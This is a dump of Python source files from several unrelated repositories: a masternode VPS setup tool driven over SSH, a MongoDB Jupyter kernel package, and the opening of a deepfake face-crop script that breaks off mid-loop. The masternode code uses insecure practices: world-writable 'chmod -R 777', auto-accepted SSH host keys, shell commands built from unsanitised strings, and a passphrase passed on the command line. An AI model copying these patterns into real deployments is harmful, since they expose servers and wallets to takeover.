print("Send configuration file to VPS..")
vps.createFileWithContents(server, user, password, confFile, sourceFile)
print("Configuration file sent successfully!\n")
def updateVpsPermissions(server, user, password, coinName):
"""Updates the folder permissions for the coin user so that the daemon may run.
Args:
server (str): The IP address of the server to connect to.
user (str): The username to be used in the connection.
password (str): The password associated with the user.
coinName (str): The name of the coin.
"""
print("Updating folder permissions for {0} user.".format(coinName))
command = "chmod -R 777 /home/{0}".format(coinName)
vps.sendSingleCommand(server, user, password, command)
print("")
def stopVpsDaemon(cli, daemonCli, server, user, password, coinName):
"""Stops the vps daemon if it's running.
Args:
cli (str): The name of the coin cli to be used.
daemonCli (str): The name of the coin daemon to be used.
server (str): The IP address of the server to connect to.
user (str): The username to be used in the connection.
password (str): The password associated with the user.
coinName (str): The name of the coin.
"""
print("Stopping daemon on VPS (if running)..")
# Open SSH connection
channel = vps.openChannel(server, user, password)
try:
if vps.isProcessRunning(channel, daemonCli):
# Stop the process if it's currently running
command = "su -c \"{0} stop\" {1}".format(cli, coinName)
output = vps.sendCommand(channel, command)
# Allow enough time for process to terminate
time.sleep(20)
finally:
# Close ssh connection
vps.closeChannel(channel)
print("")
def startVpsDaemon(daemonCli, server, user, password, coinName):
"""Starts the vps daemon.
Args:
daemonCli (str): The name of the coin daemon to be used.
server (str): The IP address of the server to connect to.
user (str): The username to be used in the connection.
password (str): The <PASSWORD> with the user.
coinName (str): The name of the coin.
"""
print("Starting daemon on VPS..")
# Open SSH connection
channel = vps.openChannel(server, user, password)
try:
command = "su -c \"{0} -daemon\" {1}".format(daemonCli, coinName)
print(vps.sendCommand(channel, command))
# Allow enough time for daemon to start
time.sleep(20)
if not vps.isProcessRunning(channel, daemonCli):
raise ValueError("Failed to start daemon on VPS")
finally:
# Close ssh connection
vps.closeChannel(channel)
def clearVpsDebugFile(server, user, password, debugFile):
"""Removes the debug file specified.
Args:
server (str): The IP address of the server to connect to.
user (str): The username to be used in the connection.
password (str): The password associated with the user.
debugFile (str): The name of the file to be removed.
"""
print("Removing VPS debug file: {0}".format(debugFile))
command = "rm -rf {0}".format(debugFile)
vps.sendSingleCommand(server, user, password, command)
print("")
def pollForVpsDaemonActivationReady(server, user, password, debugFile):
"""Waits until the daemon is ready to be activated.
Args:
server (str): The IP address of the server to connect to.
user (str): The username to be used in the connection.
password (str): The <PASSWORD> with the user.
debugFile (str): The name of the file to search.
"""
done = False
command = "grep \"{0}\" {1} > /dev/null".format(ACTIVATION_STRING, debugFile)
while done == False:
try:
print("Wait until VPS daemon is activation ready.. This may take some time..")
vps.sendSingleCommand(server, user, password, command)
except:
time.sleep(10)
else:
done = True
print("")
def setupVpsMasternode(cli, daemonCli, server, user, password, confFile, masternodeKey, coinName, debugFile):
"""Sets up the masternode on the VPS. Specifically:
1. Stop daemon (if necessary).
2. Copy masternode conf file to vps.
3. Start daemon.
Args:
cli (str): The name of the coin cli to be used.
daemonCli (str): The name of the coin daemon to be used.
server (str): The IP address of the server to connect to.
user (str): The username to be used in the connection.
password (str): The password associated with the user.
confFile (str): The full path to the configuration file to be used.
masternodeKey (str): The masternode key associated with this node.
coinName (str): The name of the coin.
"""
# We must stop the current daemon to prevent issues with the conf file
stopVpsDaemon(cli, daemonCli, server, user, password, coinName)
# Load new conf file
setupVpsConfFile(server, user, password, confFile, masternodeKey)
# We must update folder permissions so that daemon can run
updateVpsPermissions(server, user, password, coinName)
# Clear debug file so that it can be searched later
clearVpsDebugFile(server, user, password, debugFile)
# Start daemon
startVpsDaemon(daemonCli, server, user, password, coinName)
# Poll for daemon to be ready for activation
# Note: It seems like the activation doesn't work outside of wallet so disabling for now..
#pollForVpsDaemonActivationReady(server, user, password, debugFile)
def setupMasternodeConfFile(server, label, masternodeConfFile, masternodePort, masternodeOutput, masternodeKey):
"""Sets up the local masternode conf file with the masternode values.
Args:
server (str): The IP address of the server to connect to.
label (str): The label to be used when generating a new address.
masternodeConfFile (str): The full path to the masternode conf file.
masternodePort (int): The port number associated with the masternode.
masternodeOutput (dict): The masternode output containing the collateral txinfo.
masternodeKey (str): The masternode key associated with this node.
"""
print("Setup masternode conf file..")
# Append to the existing file
with open(masternodeConfFile, 'a') as f:
line = "\n{0} {1}:{2} {3} {4} {5}".format(label, server, masternodePort, masternodeKey, masternodeOutput["txhash"], masternodeOutput["outputidx"])
f.write(line)
def startMasternodeAlias(cli, label):
"""Start the masternode by its alias.
Args:
cli (str): The name of the coin cli to be used.
label (str): The label to be used when generating a new address.
"""
print("Start masternode..")
try:
# If the wallet is not encrypted, no unlocking is necessary
daemon.masternodeStartAlias(cli, label)
except:
print("Wallet is locked, please unlock your wallet..")
unlockWallet(cli)
daemon.masternodeStartAlias(cli, label)
print("Masternode started successfully!")
def setupWalletForMasternode(cli, server, label, masternodeConfFile, masternodePort, masternodeOutput, masternodeKey):
"""Sets up the wallet for the newly created masternode.
Args:
cli (str): The name of the coin cli to be used.
server (str): The IP address of the server to connect to.
label (str): The label to be used when generating a new address.
masternodeConfFile (str): The full path to the masternode conf file.
masternodePort (int): The port number associated with the masternode.
masternodeOutput (dict): The masternode output containing the collateral txinfo.
masternodeKey (str): The masternode key associated with this node.
"""
setupMasternodeConfFile(server, label, masternodeConfFile, masternodePort, masternodeOutput, masternodeKey)
startMasternodeAlias(cli, label)
def getCoinBinaries(envHome, cliName, daemonName):
"""Gets the full paths of the binaries associated with this coin.
Args:
envHome (str): The name of the home environment variable.
cliName (str): The name of the cli binary associated with this coin.
daemonName (str): The name of the daemon binary associated with this coin.
Returns:
2-Tuple: Tuple containing the full paths as described.
"""
homePath = environ.get(envHome)
cli = os.path.join(homePath, "daemon", cliName)
daemonCli = os.path.join(homePath, "daemon", daemonName)
return (cli, daemonCli)
def getCoinFiles(envUser, walletConf, masternodeConf):
"""Gets the full paths of the conf files associated with this coin.
Args:
envUser (str): The name of the user environment variable.
walletConf (str): The name of the wallet conf file.
masternodeConf (str): The name of the masternode conf file.
Returns:
2-Tuple: Tuple full paths as described.
"""
userPath = environ.get(envUser)
walletConfFile = os.path.join(userPath, walletConf)
masternodeConfFile = os.path.join(userPath, masternodeConf)
return (walletConfFile, masternodeConfFile)
def checkPrerequisites(config):
"""Checks that certain prerequisits are met before continuing. Specifically:
1. Check that necessary environment variables are defined.
2. Check that the local wallet is installed.
Args:
envUser (str): The name of the user environment variable.
masternodeConf (str): The name of the masternode conf file.
"""
print("Checking wallet requirements..")
cli, daemonCli = getCoinBinaries(config["Environment"]["Home"], config["Coin"]["Cli"], config["Coin"]["Daemon"])
checkIfEnvironmentDefined(config["Environment"]["Home"], config["Environment"]["User"])
checkIfWalletInstalled(cli, daemonCli)
print("")
def setup(server, user, password, label, config):
"""Top level function associated with this module. Responsible for the core configuration
of this masternode. Specifically it will:
1. Start local daemon.
2. Poll for wallet to be synced.
3. Perform masternode transactions.
4. Setup masternode config on vps.
5. Setup the local wallet for the masternode.
6. Stop local daemon.
"""
# Determine binary and file names based on config
cli, daemonCli = getCoinBinaries(config["Environment"]["Home"], config["Coin"]["Cli"], config["Coin"]["Daemon"])
walletConfFile, masternodeConfFile = getCoinFiles(config["Environment"]["User"], config["Wallet"]["WalletConf"], config["Wallet"]["MasternodeConf"])
setupWallet(walletConfFile)
localDaemon = startLocalDaemon(daemonCli)
try:
pollForWalletSync(cli)
masternodeOutput, masternodeKey = setupMasternodeTransaction(cli, label, float(config["Coin"]["Collateral"]))
vpsConfFile = "/home/{0}/{1}/{2}".format(config["Coin"]["Name"], config["VPS"]["DataDir"], config["VPS"]["ConfFile"])
vpsDebugFile = "/home/{0}/{1}/{2}".format(config["Coin"]["Name"], config["VPS"]["DataDir"], config["VPS"]["DebugFile"])
setupVpsMasternode(config["Coin"]["Cli"], config["Coin"]["Daemon"], server, user, password, vpsConfFile, masternodeKey, config["Coin"]["Name"], vpsDebugFile)
setupWalletForMasternode(cli, server, label, masternodeConfFile, int(config["Coin"]["Port"]), masternodeOutput, masternodeKey)
finally:
stopLocalDaemon(cli)
localDaemon.wait()
|
mtmonte/MasternodeSetup | MasternodeSetup/vps.py | #!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2018 Cosmos Coin Developers, https://cosmoscoin.co/
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import time
import json
import paramiko
from io import BytesIO
from urllib.request import urlopen
DEFAULT_DECODE = "utf-8"
CHECK_RELEASE_COMMAND = "lsb_release -a"
UPDATE_TOOLS_COMMAND = "apt-get -y update && apt-get -y upgrade && apt-get -y install wget"
INSTALL_COIN_COMMAND = "mkdir -p /home/{0} && " \
"wget -qO- {1} | tar xvz --strip-components=1 -C /home/{0} && " \
"cp /home/{0}/bin/* /usr/local/bin"
GET_LATEST_GIT_RELEASE_COMMAND = "https://api.github.com/repos/{0}/{1}/releases/latest"
IS_COIN_INSTALLED_COMMAND = "command -v {0}"
CHECK_IF_PROCESS_RUNNING_COMMAND_FMT = "ps cax | grep {0} > /dev/null"
def openChannel(server, username, password):
"""Open an SSH channel with the specified server.
Args:
server (str): The IP address of the server to connect to.
username (str): The username to be used in the connection.
password (str): The password associated with the user.
Returns:
Obj: A client object containing the state of the connection.
"""
channel = paramiko.SSHClient()
channel.set_missing_host_key_policy(paramiko.AutoAddPolicy)
channel.connect(server, username=username, password=password)
return channel
def closeChannel(channel):
"""Close a previously open SSH connection.
Args:
channel (obj): The client object returned by the open function.
"""
channel.close()
def sendCommand(channel, command):
"""Send a comment across the channel and return the results.
Args:
channel (obj): The client object returned by the open function.
command (str): The command to be executed.
Returns:
Str: A string object containing the command results.
"""
output = BytesIO()
stdin, stdout, stderr = channel.exec_command(command)
# Parse the partial command output while the command is running
while not stdout.channel.exit_status_ready():
while stdout.channel.recv_ready():
output.write(stdout.channel.recv(1024))
time.sleep(2)
# Parse any remaining channel output
while stdout.channel.recv_ready():
output.write(stdout.channel.recv(1024))
# Parse any error channel output
while stderr.channel.recv_ready():
output.write(stderr.channel.recv(1024))
exitStatus = stdout.channel.recv_exit_status()
if exitStatus != 0:
raise ValueError("Command: \"{0}\" failed with status: {1}".format(command, exitStatus))
return output.getvalue().decode(DEFAULT_DECODE)
def createFileWithContents(server, username, password, filePath, data):
"""Create a file on the specified server with the contents provided.
Args:
server (str): The IP address of the server to connect to.
username (str): The username to be used in the connection.
password (str): The password associated with the user.
filePath (str): The relative path of the file to be written (relative to $HOME)
data (str): The data to be written into the file.
"""
directory = os.path.dirname(filePath)
# Open SSH connection
channel = openChannel(server, username, password)
sftp = channel.open_sftp()
# Create directory if necessary
try:
sftp.mkdir(directory)
except IOError:
pass
# Transfer and replace the file contents
try:
with sftp.open(filePath, 'w') as f:
f.write(data)
finally:
# Close ssh connection
closeChannel(channel)
def checkRelease(channel, codeName):
"""Check and verify the release on the VPS server.
Args:
channel (obj): The client object returned by the open function.
codeName (str): The expected release code name to verify.
"""
print("Checking VPS operating system release..\n")
output = sendCommand(channel, CHECK_RELEASE_COMMAND)
print(output)
if codeName not in output:
raise ValueError("Unsupported operating system, refer to documentation for more info")
def checkDaemonNotRunning(channel, daemonName):
"""Check that the daemon is not currently running. This is done to avoid potential problems in the future.
Args:
channel (obj): The client object returned by the open function.
daemonName (str): The name of the daemon to check.
"""
print("Checking that daemon is not currently running on VPS..")
if isProcessRunning(channel, daemonName):
message = "The \'{0}\' daemon is currently running, please stop it and try again".format(daemonName)
raise ValueError(message)
print("")
def updateTools(channel):
"""Update the installation and tools on the VPS.
Note: The output won't be printed until the update is complete.
Args:
channel (obj): The client object returned by the open function.
"""
print("Updating tools on VPS..\n")
print(sendCommand(channel, UPDATE_TOOLS_COMMAND))
def getInstallCommand(coinName, gitOwner, gitProject, namePattern):
"""Determine the installation command based on the coin's latest release.
Args:
coinName (str): Name of the coin to install.
gitOwner (str): The Git owner of the project.
gitProject (str): The name of the project in Git.
namePattern (str): A pattern to be used to identify the release version to get.
Returns:
String: A string containing the install command to be executed.
"""
print("Get the latest masternode release")
url = GET_LATEST_GIT_RELEASE_COMMAND.format(gitOwner, gitProject)
releases = json.load(urlopen(url))
matches = [release for release in releases["assets"] if namePattern in release["name"]]
if len(matches) != 1:
message = "Unexpected number of matches: {0} for the specified pattern {1}, please check configuration".format(len(txValues), namePattern)
raise ValueError(message)
downloadUrl = matches[0]["browser_download_url"]
print("Latest release found: {0}\n".format(downloadUrl))
return INSTALL_COIN_COMMAND.format(coinName, downloadUrl)
def installMasternode(coinName, channel, daemonName, installCommand):
"""Install the masternode binaries on the VPS.
Args:
channel (obj): The client object returned by the open function.
daemonName (str): The name of the daemon binary associated with the installation.
installCommand (str): The full command to be executed for installation.
"""
print("Installing masternode on VPS..")
print("Install command:\n\n{0}\n".format(installCommand))
try:
# This command will fail if masternode binaries already installed
sendCommand(channel, IS_COIN_INSTALLED_COMMAND.format(daemonName))
except:
print(sendCommand(channel, installCommand))
else:
print("{0} is already installed.. skipping installation.\n".format(coinName))
def isProcessRunning(channel, processName):
"""Check if the specified process is currently running.
Args:
channel (obj): The client object returned by the open function.
processName (str): The name of the process to check.
Returns:
Boolean: True if the process is running, False otherwise.
"""
try:
# If process is not running, an exception is raised
command = CHECK_IF_PROCESS_RUNNING_COMMAND_FMT.format(processName)
sendCommand(channel, command)
except:
return False
else:
return True
def createUser(channel, coinName):
"""Creates a user for the coin if necessary.
Args:
channel (obj): The client object returned by the open function.
coinName (str): Name of the coin.
"""
print("Creating user for masternode: {0}, if necessary..".format(coinName))
try:
# If this command fails, the user doesn't exist
sendCommand(channel, "id -u {0}".format(coinName))
except:
# Create user
sendCommand(channel, "useradd {0}".format(coinName))
print("")
def sendSingleCommand(server, user, password, command):
"""Wrapper function to open a connection and execute a single command.
Args:
server (str): The IP address of the server to connect to.
username (str): The username to be used in the connection.
password (str): <PASSWORD>.
command (str): The command to be executed.
Returns:
String: String containing the command output.
"""
# Open SSH connection
channel = openChannel(server, user, password)
output = ""
try:
output = sendCommand(channel, command)
finally:
# Close ssh connection
closeChannel(channel)
return output
def setup(server, user, password, config):
"""Program entry point. This function will setup the VPS per the coin requirements.
Args:
server (str): The IP address of the server to connect to.
username (str): The username to be used in the connection.
password (str): <PASSWORD>.
config (dict): Dictionary containing the options parsed by the utility.
"""
# Open SSH connection
channel = openChannel(server, user, password)
try:
# Check that OS is the right version
checkRelease(channel, config["VPS"]["UbuntuCodename"])
# Check that daemon is not running
checkDaemonNotRunning(channel, config["Coin"]["Daemon"])
# Update OS tools
updateTools(channel)
# Install masternode
installCommand = getInstallCommand(config["Coin"]["Name"], config["Git"]["Owner"], config["Git"]["Project"], config["Git"]["NamePattern"])
installMasternode(config["Coin"]["Name"], channel, config["Coin"]["Daemon"], installCommand)
# Create user for masternode
createUser(channel, config["Coin"]["Name"])
finally:
# Close ssh connection
closeChannel(channel)
|
mtmonte/MasternodeSetup | MasternodeSetup/daemon.py | #!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2018 Cosmos Coin Developers, https://cosmoscoin.co/
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import subprocess
DEFAULT_DECODE = "utf-8"
WALLET_LOCK_TIMEOUT_SEC = 60
DAEMON_STOP_COMMAND = "{0} stop"
DAEMON_START_COMMAND = "{0} -daemon"
CLI_GET_BALANCE = "{0} getbalance"
CLI_LIST_UNSPENT = "{0} listunspent"
CLI_GET_BLOCKCHAIN_INFO = "{0} getblockchaininfo"
CLI_UNLOCK_WALLET = "{0} walletpassphrase {1} {2}"
CLI_SEND_TO_ADDRESS = "{0} sendtoaddress {1} {2}"
CLI_GENERATE_NEW_ADDRESS = "{0} getnewaddress {1}"
CLI_MASTERNODE_GENKEY = "{0} masternode genkey"
CLI_MASTERNODE_OUTPUTS = "{0} masternode outputs"
CLI_MASTERNODE_START_ALIAS = "{0} masternode start-alias {1}"
def start(daemon):
"""Wrapper function for the relevant RPC function call.
Args:
daemon (str): Full path to daemon binary associated with coin.
Returns:
String: String containing the command output.
"""
command = DAEMON_START_COMMAND.format(daemon).split(" ")
return subprocess.Popen(command, stdout=subprocess.PIPE)
def stop(cli):
"""Wrapper function for the relevant RPC function call.
Args:
cli (str): Full path to cli binary associated with coin.
Returns:
String: String containing the command output.
"""
command = DAEMON_STOP_COMMAND.format(cli)
return subprocess.check_output(command).decode(DEFAULT_DECODE)
def getBlockchainInfo(cli):
"""Wrapper function for the relevant RPC function call.
Args:
cli (str): Full path to cli binary associated with coin.
Returns:
String: String containing the command output.
"""
command = CLI_GET_BLOCKCHAIN_INFO.format(cli)
return subprocess.check_output(command).decode(DEFAULT_DECODE)
def generateNewAddress(cli, label):
"""Wrapper function for the relevant RPC function call.
Args:
cli (str): Full path to cli binary associated with coin.
label (str): Label associated with the address to be generated.
Returns:
String: String containing the command output.
"""
command = CLI_GENERATE_NEW_ADDRESS.format(cli, label)
return subprocess.check_output(command).decode(DEFAULT_DECODE).strip()
def unlockWallet(cli, passphrase):
"""Wrapper function for the relevant RPC function call.
Args:
cli (str): Full path to cli binary associated with coin.
passphrase (str): Passphrase to be used in wallet unlock.
Returns:
String: String containing the command output.
"""
command = CLI_UNLOCK_WALLET.format(cli, passphrase, WALLET_LOCK_TIMEOUT_SEC)
return subprocess.check_output(command, stderr=subprocess.STDOUT).decode(DEFAULT_DECODE)
def sendToAddress(cli, address, amount):
"""Wrapper function for the relevant RPC function call.
Args:
cli (str): Full path to cli binary associated with coin.
address (str): Address to be used for sending.
amount (int): Amount of coins to be sent.
Returns:
String: String containing the command output.
"""
command = CLI_SEND_TO_ADDRESS.format(cli, address, amount)
return subprocess.check_output(command, stderr=subprocess.STDOUT).decode(DEFAULT_DECODE).strip()
def getTotalBalance(cli):
"""Wrapper function for the relevant RPC function call.
Args:
cli (str): Full path to cli binary associated with coin.
Returns:
String: String containing the command output.
"""
command = CLI_GET_BALANCE.format(cli)
return subprocess.check_output(command).decode(DEFAULT_DECODE)
def listUnspent(cli):
"""Wrapper function for the relevant RPC function call.
Args:
cli (str): Full path to cli binary associated with coin.
Returns:
String: String containing the command output.
"""
command = CLI_LIST_UNSPENT.format(cli)
return subprocess.check_output(command).decode(DEFAULT_DECODE)
def getMasternodeOutputs(cli):
"""Wrapper function for the relevant RPC function call.
Args:
cli (str): Full path to cli binary associated with coin.
Returns:
String: String containing the command output.
"""
command = CLI_MASTERNODE_OUTPUTS.format(cli)
return subprocess.check_output(command).decode(DEFAULT_DECODE)
def generateMasternodeKey(cli):
"""Wrapper function for the relevant RPC function call.
Args:
cli (str): Full path to cli binary associated with coin.
Returns:
String: String containing the command output.
"""
command = CLI_MASTERNODE_GENKEY.format(cli)
return subprocess.check_output(command).decode(DEFAULT_DECODE).strip()
def masternodeStartAlias(cli, alias):
"""Wrapper function for the relevant RPC function call.
Args:
cli (str): Full path to cli binary associated with coin.
alias (str): Alias associated with masternode to be started.
Returns:
String: String containing the command output.
"""
command = CLI_MASTERNODE_START_ALIAS.format(cli, alias)
return subprocess.check_output(command).decode(DEFAULT_DECODE).strip()
|
Abhi-1U/imongo | imongo/__init__.py | """A MongoDB kernel for Jupyter"""
__version__ = '0.1.0'
|
Abhi-1U/imongo | setup.py | <filename>setup.py<gh_stars>10-100
#!/usr/bin/env python
import json
import os
import sys
from setuptools import setup
from setuptools.command.install import install
if sys.version_info.major != 3 or sys.version_info.minor < 6:
sys.exit('IMongo supports Python 3.6+ only')
class Installer(install):
def run(self):
# Regular install
install.run(self)
# Post install
print('Installing Jupyter kernelspec')
from jupyter_client.kernelspec import KernelSpecManager
from IPython.utils.tempdir import TemporaryDirectory
kernel_json = {
"argv": ["python", "-m", "imongo", "-f", "{connection_file}"],
"codemirror_mode": "shell",
"display_name": "IMongo"
}
with TemporaryDirectory() as td:
os.chmod(td, 0o755)
with open(os.path.join(td, 'kernel.json'), 'w') as f:
json.dump(kernel_json, f, sort_keys=True)
ksm = KernelSpecManager()
ksm.install_kernel_spec(td, 'imongo', user=self.user, replace=True, prefix=self.prefix)
with open('README.rst', 'r') as f:
long_description = f.read()
setup(name='imongo-kernel',
version='0.1.0',
description='A MongoDB kernel for Jupyter',
long_description=long_description,
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/gusutabopb/imongo',
packages=['imongo'],
cmdclass={'install': Installer},
license='MIT',
include_package_data=True,
install_requires=['jupyter>=1.0.0',
'ipykernel',
'pexpect>=4.2.1',
'pyyaml'],
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Intended Audience :: Science/Research',
'Development Status :: 3 - Alpha',
'Programming Language :: Python :: 3.6',
'Topic :: System :: Shells',
])
|
Abhi-1U/imongo | imongo/utils.py | <reponame>Abhi-1U/imongo
import logging
from functools import wraps
from tornado.log import LogFormatter as ColoredFormatter
import os
logger = logging.getLogger('IMongo')
def make_logger(name, fname=None) -> logging.Logger:
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
file_formatter = logging.Formatter('%(asctime)s | %(name)s | %(levelname)s: %(message)s')
FORMAT = '%(color)s[%(levelname)1.1s %(asctime)s.%(msecs).03d %(name)s]%(end_color)s %(message)s'
stream_formatter = ColoredFormatter(fmt=FORMAT, datefmt='%H:%M:%S')
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(stream_formatter)
stream_handler.setLevel(logging.INFO)
logger.addHandler(stream_handler)
try:
file_handler = logging.FileHandler(filename=fname, mode='a')
file_handler.setFormatter(file_formatter)
file_handler.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
except FileNotFoundError as f:
os.makedirs(os.path.dirname(fname), exist_ok=True)
file_handler = logging.FileHandler(filename=fname, mode='w+')
file_handler.setFormatter(file_formatter)
file_handler.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
return logger
def exception_logger(func):
@wraps(func)
def catcher(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
params = func.__module__, func.__name__, e.__class__.__name__, e.args
logger.debug('{}.{} failed | {}: {}'.format(*params))
return None
return catcher
|
Abhi-1U/imongo | imongo/__main__.py | <filename>imongo/__main__.py
from ipykernel.kernelapp import IPKernelApp
from .kernel import MongoKernel
IPKernelApp.launch_instance(kernel_class=MongoKernel)
|
kenil-shah/DeepFake_Detection | main.py | import colorsys
import cv2
import numpy as np
from keras import backend as K
from keras.preprocessing.image import ImageDataGenerator
from keras.preprocessing import image
from keras.models import load_model,Model, Sequential
from keras.layers import Input, Dropout, Flatten, Dense,Conv2D, MaxPool2D, GlobalMaxPooling2D,Activation,GlobalAveragePooling2D
from keras.layers import BatchNormalization,multiply,Lambda
from keras import optimizers
from PIL import Image
from yolo3.model import yolo_eval, yolo_body, tiny_yolo_body
from yolo3.utils import letterbox_image
import os
from keras.utils import multi_gpu_model
import time
from numba import cuda
from os import listdir
from os.path import isfile, join
import torch
import torch.nn as nn
import torchvision.models as models
from torchvision.transforms import Normalize
from sklearn import metrics
from efficientnet.keras import EfficientNetB5, EfficientNetB6
from keras.applications.xception import Xception, preprocess_input
import json
gpu = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class MyResNeXt(models.resnet.ResNet):
def __init__(self, training=True):
super(MyResNeXt, self).__init__(block=models.resnet.Bottleneck,
layers=[3, 4, 6, 3],
groups=32,
width_per_group=4)
self.fc = nn.Linear(2048, 1)
class YOLO(object):
_defaults = {
"model_path": 'model_data/yolo.h5',
"anchors_path": 'model_data/yolo_anchors.txt',
"classes_path": 'model_data/coco_classes.txt',
"score" : 0.3,
"iou" : 0.45,
"model_image_size" : (416, 416),
"gpu_num" : 1,
}
@classmethod
def get_defaults(cls, n):
if n in cls._defaults:
return cls._defaults[n]
else:
return "Unrecognized attribute name '" + n + "'"
def load_models(self, **kwargs):
self.__dict__.update(self._defaults)
self.__dict__.update(kwargs)
self.class_names = self._get_class()
self.anchors = self._get_anchors()
self.sess = K.get_session()
self.boxes, self.scores, self.classes = self.generate()
def _get_class(self):
classes_path = os.path.expanduser(self.classes_path)
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def _get_anchors(self):
anchors_path = os.path.expanduser(self.anchors_path)
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def generate(self):
model_path = os.path.expanduser(self.model_path)
assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'
# Load model, or construct model and load weights.
num_anchors = len(self.anchors)
num_classes = len(self.class_names)
is_tiny_version = num_anchors==6 # default setting
try:
self.yolo_model = load_model(model_path, compile=False)
except:
self.yolo_model = tiny_yolo_body(Input(shape=(None,None,3)), num_anchors//2, num_classes) \
if is_tiny_version else yolo_body(Input(shape=(None,None,3)), num_anchors//3, num_classes)
self.yolo_model.load_weights(self.model_path) # make sure model, anchors and classes match
else:
assert self.yolo_model.layers[-1].output_shape[-1] == \
num_anchors/len(self.yolo_model.output) * (num_classes + 5), \
'Mismatch between model and given anchor and class sizes'
hsv_tuples = [(x / len(self.class_names), 1., 1.)
for x in range(len(self.class_names))]
self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
self.colors = list(
map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),
self.colors))
np.random.seed(10101) # Fixed seed for consistent colors across runs.
np.random.shuffle(self.colors) # Shuffle colors to decorrelate adjacent classes.
np.random.seed(None) # Reset seed to default.
# Generate output tensor targets for filtered bounding boxes.
self.input_image_shape = K.placeholder(shape=(2, ))
if self.gpu_num>=2:
self.yolo_model = multi_gpu_model(self.yolo_model, gpus=self.gpu_num)
boxes, scores, classes = yolo_eval(self.yolo_model.output, self.anchors,
len(self.class_names), self.input_image_shape,
score_threshold=self.score, iou_threshold=self.iou)
return boxes, scores, classes
def detect_image(self, image):
if self.model_image_size != (None, None):
assert self.model_image_size[0] % 32 == 0, 'Multiples of 32 required'
assert self.model_image_size[1] % 32 == 0, 'Multiples of 32 required'
boxed_image = letterbox_image(image, tuple(reversed(self.model_image_size)))
else:
new_image_size = (image.width - (image.width % 32),
image.height - (image.height % 32))
boxed_image = letterbox_image(image, new_image_size)
image_data = np.array(boxed_image, dtype='float32')
image_data /= 255.
image_data = np.expand_dims(image_data, 0) # Add batch dimension.
out_boxes, out_scores, out_classes = self.sess.run(
[self.boxes, self.scores, self.classes],
feed_dict={
self.yolo_model.input: image_data,
self.input_image_shape: [image.size[1], image.size[0]],
K.learning_phase(): 0
})
person_boxes = []
for i, c in reversed(list(enumerate(out_classes))):
box = out_boxes[i]
top, left, bottom, right = box
top = max(0, np.floor(top + 0.5).astype('int32'))
left = max(0, np.floor(left + 0.5).astype('int32'))
bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))
right = min(image.size[0], np.floor(right + 0.5).astype('int32'))
height = bottom-top
width = right-left
top = top - int(height*0.1)
bottom = bottom + int(height*0.1)
left = left - int(width*0.1)
right = right + int(width*0.1)
top = max(0, top)
left = max(0, left)
right = min(image.size[0],right)
bottom = min(image.size[1],bottom)
coordinates= [top,bottom, left, right]
person_boxes += [coordinates]
return image, person_boxes
def close_session(self):
self.sess.close()
def detect_video(self,frame):
image = Image.fromarray(frame)
image, person_boxes = self.detect_image(image)
return person_boxes
class GenerateFaceCrops:
def __init__(self, video_directory, sample_rate):
self.video_directory = video_directory
self.sample_rate = sample_rate
def face_crops(self):
try:
os.mkdir("FaceCrops")
except Exception as e:
print(e)
videos = [f for f in listdir(self.video_directory) if isfile(join(self.video_directory, f))]
yolo_object = YOLO()
yolo_object.load_models()
for v in videos:
try:
video_path = self.video_directory+"/"+v
video_name = video_path.split("/")[-1].split(".")[0]
os.mkdir("FaceCrops/" + video_name)
print(video_name)
vid = cv2.VideoCapture(video_path)
ret, frame = vid.read()
person_boxes = yolo_object.detect_video(frame)
for i in range(0, len(person_boxes)):
os.mkdir("FaceCrops/" + video_name + "/" + "Person" + str(i + 1))
person_no = 1
for bbox in person_boxes:
